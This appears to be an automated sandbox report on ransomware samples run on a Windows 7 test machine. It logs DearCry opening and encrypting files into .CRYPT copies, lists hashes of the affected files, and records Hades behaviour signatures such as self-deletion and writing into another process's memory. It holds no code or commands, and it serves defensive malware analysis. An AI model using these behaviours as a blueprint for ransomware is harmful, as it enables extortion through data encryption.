File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SX809FAK\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\gadget.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\EVRGREEN\THMBNAIL.PNG.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\LogoCanary.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-utilities.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\js\clock.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_m.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\settings.html C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VC\msdia90.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\CATALOG.XML C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationUp_SelectionSubpicture.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Internet Explorer\perfcore.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-core-kit.xml.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-filesystems.xml.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\1033\xlsrvintl.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\css\flyout.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libspeex_resampler_plugin.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_foggy.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Thatch.xml.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME22.CSS C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSOSTYLE.DLL C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Mozilla Firefox\defaults\pref\channel-prefs.js.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_h.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGCHKBRD.XML.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\fr-FR\cpu.html C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark.css.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-text.xml.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\en-US\cpu.html C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectStatusIconsMask.bmp.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\de\PresentationFramework.resources.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\freebl3.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\notification_helper.exe C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\java.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\javafx-font.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_left_pressed.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\settings.html C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Internet Explorer\DiagnosticsHub.DataWarehouse.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\video_filter\libblendbench_plugin.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_FileHigh.jpg.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Mozilla Firefox\api-ms-win-crt-process-l1-1-0.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\css\clock.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03012U.BMP.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SoftBlue.css.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Push\1047_576black.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\bin\management.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Mahjong\Mahjong.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME23.CSS C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\CONTACT.JPG.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\de-DE\picturePuzzle.html C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\com.jrockit.mc.console.ui.notification_contexts.xml.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\main.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\gadget.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\PROPLUS\SETUP.XML C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierWindowMaskRTL.bmp.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\wlsrvc.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSSP7ES.DLL.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Stationery\1033\NOTEBOOK.HTM.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\1033\LOCALDV.DLL.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FORM.JS.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\es\Microsoft.Build.Utilities.v3.5.resources.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationUp_SelectionSubpicture.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Main_Background_Loading.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\es-ES\css\settings.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe"

Network

N/A

Files

C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.xml

MD5 0f96cefe93c14e6adece5ea787d35fb5
SHA1 3dfb1f74beab2ed12f2de06c0410e569058cb693
SHA256 748f3778ee8e6d99b6e2ad300c320383c83bc004e6b6cde2b89e522cf7143630
SHA512 6daba5b8440d657fb6fbf26d7c1fc276ae6511557f376c1b60f10b93e5978f5d3b2e610dd39ad298d7f78d78c31f048e818b6c3b2f195e5be903b65b9424fc29

C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluTSFrame.png

MD5 9a530c475ef73c5896d7c7f3543b1d97
SHA1 bc80f3430254af79f06be0d37d71cca604fccae9
SHA256 318cebc3c59b5327cfb7a69507f1dcbe92a15fc1abe429bf2359e0f9664d0b2d
SHA512 dc2da4492cbb7358ebddfacc246ff4bfc3a8b2fb3e76f47519a7e6ae47fce293607ab6980e64c0a5d4bd2687b2584fe6f4d85bb4888a11760aeb0d94e8246a1b

C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-windows.xml

MD5 794eb220b9c3fc6775b08dd9425c24b0
SHA1 99daf8158bd4914c06fc33302eec1d7f5897aa93
SHA256 40aa257d744c7d904e8f62392c91389cff523bae86eac46f075f79f6b67534b0
SHA512 c8d1f7bb4ddcd2c5c212eea495d776cda2fd1cc1d22e81c885bc45dfaca878b02810a0998c40ff861a8c78d52e7718444e046562c1e792590d881a1bb336ba86

C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-util-enumerations.xml

MD5 0dbdc71d198cd2da4d8c5c38f44e66a2
SHA1 dab7e173502d5f80bc3177b0a480561b208eb1d0
SHA256 5ad2dac3e0044649be6532c957950483092115cf2992d170a98a123cc0af2818
SHA512 28506aced7d9235e3ed73e2afacc54834295818b571a7633ce8a72e8dbdd0debd225dfc307e10d82a082dac0da757a8ab6eaf5cea6b671fde4d03ead14d86b29

C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-spi-quicksearch.xml

MD5 484651b39b9f0fc3ed8153db82b39eed
SHA1 859b44bdf204a55d21755358180adc62ede0e93f
SHA256 87bc15638540621224fcbd0f2fd0a73267465418b9b2897ea2fe5b977b990c35
SHA512 aac187baafb492a6930cebd87c41e67434bc40b724a844f3684f28b18846d01efc7f85e5fd0a017f1aceae341b616d2d925ec740039b17f01a9db1223972306a

C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-ui.xml

MD5 241e2f8d1c6df84c7de7debff798313c
SHA1 8d2f93801f8b0116fe159123faaf09d607eb1d19
SHA256 00fca714016de5a5b3207fb94fc30211cf745fd4b03c120862ffd88b5f024192
SHA512 11b376dc95d904b38bc541c26078b13843d632016e3b3bce3ff8d6315bf90d97b993d56fd76802e96bb87a3dbe1de3ebe92836d48aa35b2974785e9f69957e20

C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-snaptracer.xml

MD5 b8e825d92d653fcf8f7dfb029406156b
SHA1 521f90b3653ee90e5b7b21a4732c7a8e2b2d9a92
SHA256 e9466955f535446cc4999e58805089c19bdd2cfc347519c912758cfc09e2564e
SHA512 059141bdc1e074bbbf7d43718ed5cb5ed2e4d663315f8433eb204ab083e6f9b43c4e84aec556cc190d59cd2dc1daa38343750cc18e45767de435230ecb1eaf28

C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sa.xml

MD5 626282b09a4ad2e3debc34b0f723eab4
SHA1 2d6030babe784d001777aab4153415d991534689
SHA256 17a950101ceb4026932f7ff1902aabe83d835584d89081db151d72709333aeaa
SHA512 779e64f8a33388b0fe4c0627e9dc2b706b9d13ba3d54594bbe062d22f6ed1f04128ae3f0dbb32649052f1dd1e0aabf1c70b4db5a73816706753508a791dec428

C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-threaddump.xml

MD5 4e7c2b21080a655a39e47bd0e9949c43
SHA1 9b0e102fa821e1f48cdc31c533bccc5eebd4a54e
SHA256 b366b83f2732e1e45a454bcb03aaa49ba21b9b05e122a8adc88858fe540aef21
SHA512 1e5f51a49c3b56c22d8191dfccf8d53f24247870155c5e2864617d25d0bb4e3837a3927e7d1a056230b0eca0488e1c257c88f72da7c8ac962ae7482eb5d973a9

C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office.en-us\OfficeMUISet.XML

MD5 fb7745147a1e73eb393f50685ed0307e
SHA1 0bbcb4de1fd8f558dca370e149af99388ca6021d
SHA256 36c960255b56d99527c46d829df70f2df299344a6c91ea0df037502310275ccf
SHA512 95cee37c3492fef7d3e531f6bd265ee675f426f2ae756b10936e4f9c47ab2208bdc05fc7ec8d33c94aa17f585eab71c23f1e0e86fa46085eca7247a77f87eeef

C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Module.xml

MD5 516e13b880044e4e84825e930da9e6ae
SHA1 680014911828b15dab0684b553dd0fbb0975f79c
SHA256 f59de0da569599483a5aae0f0c4f2d2c10d97576c261f15235fb3b880a12463b
SHA512 1e49c1e00206b85e61ac038aedadf43084a7406796e09f5d31130bf9be8f25fb68e96fff049cb81e3d593833d38b9b7409efe7e7550760c12ceb7ac6ea41ee65

C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Hardcover.xml

MD5 7e1c1eb317e359233365bd065bb5f9dc
SHA1 c887b29d543207b7677f53b9fb605750223456c1
SHA256 8d3f2dab5a480547e1f49f8ce3d9d876da1428527a472b58caba6f6b76962305
SHA512 d37b150d1e97a0ad62163af5082567900cc24a62d4e425e4ed44787d9fb195168666534df17a602d8214bc05c78ae58fb76cc9a255cfcbb544db51978ea882b7

C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Technic.xml

MD5 372e32c507fb0c4050e561d31f013b85
SHA1 2d9a6839875d126b9ae008f91b6c8031da6fddba
SHA256 bc10dcc05f8cf25e4bd058724739fcd1d43270c26be23642d9d3b159990d7cc2
SHA512 35664e1ac284308f7a826a2b230a9603595011f74e3440424344e4bcaaf1a4ae3726b4c378bcfadc5a6e85aeb6802948517f29d7375771666a3a1a38726e6dca

C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Urban.xml

MD5 09ddfc512856bcb18938b61214b6983a
SHA1 e61c11bfb814f6d49bcd42df0713e54df25215fb
SHA256 43de088d9626ed9eab5827f7149283986e6ca82ac1aac350c7e51764e256f696
SHA512 9f445aac5388548f329d2cfb96d3f29b282599d34722502f1774e1fff7758981622847653b14330a642a4458710e69e706ab83972567f9436cb40eb449137ec0

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TipsImageMask.bmp

MD5 cb3156c7903e0763a5d5f7b2298e833a
SHA1 0e8de3ba01ea0d2a10f6e706232b509901ce8506
SHA256 27ea5deef122c356c6cf0758cedfb350c0f5a645afeb2e171dedcf7c46de3af2
SHA512 df4467362eff7a1aff1e4074e2e3076365c3d1cdc211c06d40a6af2ad012a899cede7cb79a4f1d541040df4adc285b1419ea756ed082502bd0190e0e421a4cc8

C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewAttachmentIconsMask.bmp

MD5 bbf2d0e9eea1bc1e7c868ed7b1283958
SHA1 c2ab0419d8e59e56f5d36d66e10adbe8c7f79039
SHA256 ae40e84593ac3e961c0db15d5aee23ee54210d646a7786651f052371ffc38c87
SHA512 0f6ab7f9e7a0efec1c798072d979a98492ed8cd9f0d71637ecd42f138bb1de218f5d5f6c6fc94c2ca641375738f2a191c6c6486ab57d375d0a861472757a2d80

C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.TH.XML

MD5 535616fac638a62e4a36c2bf2fcefd47
SHA1 cedbf3d4ef317151fcd9eb89ff106ca3699396d9
SHA256 dd40897f3c1ea3dc6e06f9507f151ef59879b730e8cad0cd58438fbeaad6d00e
SHA512 7e3019a87460f15b557a6c1cb0c11ea158d247ff21480d7a7db993d821e0a7ca2cbb425cbba0fe3d719be98b9c9a6e72dd273c5f4e8f53031e92d9ae0f462f4a

C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.AU.XML

MD5 d2f28dba18db15da8638c93a43c92078
SHA1 fdad7a7af03bb3419a24b09eb2826c3e75ada2fc
SHA256 673884634ba6c369d193c811e2ceb7f1a4d67a42d75fa3849de4438de990d5b9
SHA512 35c8e1b80401ace5611ce89a989ee25eca38901d7901c2a2b5a337abbca7ebf528fff9fcb6d2dab97820830e911961c15055ddc4b5b6482a55a445fccc46941a

C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.XML

MD5 c889899deeed19310e5ac540f1596697
SHA1 198156431932d2bf8b79ed0c808f30d02ae4b3c2
SHA256 0dc572c2e972cd84a0c905026431c80004a0cced51a45ee1d2b48e25cbd627ab
SHA512 e901a26e68f675d19b7a607bd6b14b279cab391ad0c752b5c69581ad9b0f5817d3529b438dbeb5773a8b5ab0278bde90a4e7c37cf27e8accfe9c8de662e14ff6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\DesktopSharingHub\readme.txt

MD5 dbac9649c4bd702f55fbd1afafe87c44
SHA1 0d914f4a809cfe400ca111ebfbd0ad552d500785
SHA256 b9dfa3b30224bd5eef298531c945d5f2f6bb978b7ef42e5ef09715a535172127
SHA512 86d7786b400303b1fb722689aba7e8ef6a01ad7e2776194c5d545a7d7357dd91e7079296790587210683db7f4385f98f281272fd3d1ad6770dabf401709a6415

C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\UGUBWRQR\desktop.ini

MD5 cb856e8bdfb00c240d43441aa7c62e9f
SHA1 d0c9def032806d32bc485ea5493e34217d5091c9
SHA256 f495547fca5a5a2c40dccebefe40160efb8bc2888e8afef712b096b5f2585b44
SHA512 770a9aa6e15da08da30c88a594ecdb1354cb5342b3b9da31abe6f312e3e31575b9e7748ac7227d6a1414c6bd7b66552d857bb1df302c848648557317852081ef

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tiles\pin9728060290\msapplication.xml

MD5 76fd968461edb535e6acfdf926cd1669
SHA1 77a81320a9c1b6a1a170118b1cf4ab80add44908
SHA256 d70aa8e79cfca04ee991d33a37352d66df118c720a3b80c58b8c3a54f2608aee
SHA512 fdf213bd15fbfce5365f73901781734942a711be8f3f590bff1091601dbc6c715c905f108b8c3f568e0d6c83028fbea077044a7cec054b675b63823847de8b91

C:\ProgramData\Microsoft\Windows\Caches\{41462E22-6FAD-4079-8CD7-8D2731E4A375}.2.ver0x0000000000000002.db

MD5 d846dfbc02378d2abc6f1bfe15fcbb41
SHA1 7c2258eeef30b2332f8078443aaad2dd03330450
SHA256 3982088d0f4ad78ba7e0c2d55a171c42a95541e18fa8caddba0a43931aace384
SHA512 ba96848d686625b8045312390a164bca810383f5018221fd05892e5905f624d4ce2b0f98283fc7ca74c0b2f6ab65071efce31e96a54a552fc14dd9ec69284a9e

C:\ProgramData\Microsoft\Windows\Caches\{2388BCF4-53D9-4E4F-92D4-56774A7C0F36}.2.ver0x0000000000000001.db

MD5 c20fc0a5bf22801a1e22a7433c66de17
SHA1 2f70426afa08748f631a0d1013cb5b3f88879e09
SHA256 116388fbca2c75260a350e2a7e23b972601a2efaa7db7d65d9859a9387ab5250
SHA512 bb3e4fe86f2c904b5834d5b265056dc4fe5c6c43ecbcb5c09cf74ee64b31558b3545c97996f4f69cc478f7aee5cdb53e730b6af3929bf1e0e964d925ce74051d

C:\ProgramData\Microsoft\Windows\Caches\{1D2729A6-BF93-41C5-9972-10C6A9D3FDA8}.2.ver0x0000000000000001.db

MD5 3c6fcf1c23b09bf91e99d9080c6021b6
SHA1 c74b22dcdc9cd100c10742c439d0bb7c8588f056
SHA256 6f35a61fe7eb497dee36491fdb3f0e307a03e45efb762c9db852e466b9f55efa
SHA512 b54d40df82381c7e12e20391deabf1088716c38ec46b590c4c4fc77f79f6bbd49ec485c7981b38765a74d5ea25f6a49e6f1e9df5398ef3c72a458636a97463ff

C:\Users\desktop.ini

MD5 ace3165e852adb8aedbeda2aa3be570b
SHA1 4577ff7e92850e2723008f6c269129bd06d017ea
SHA256 237f73d46d3501de63eae1f85fdf37e65ddced70f013b7f178d1ee52b08f051f
SHA512 cf77563b9295b191ce2f309e03618d1ab4d317f65b87dbecc4904ee2d058db06d23c20c199571b0fafb67ae5ec5166b76af0b7d8bfe3996b0dde9751e28f8c03

Analysis: behavioral25

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:40

Platform

win7-20240704-en

Max time kernel

1443s

Max time network

1454s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"

Signatures

Hades Ransomware

ransomware hades

Hades payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

CryptOne packer

cryptone packer
Description Indicator Process Target
N/A N/A N/A N/A

Renames multiple (246) files with added filename extension

ransomware

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1360 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan
PID 1360 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan
PID 1360 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe C:\Users\Admin\AppData\Roaming\Play8Pla\Wwan
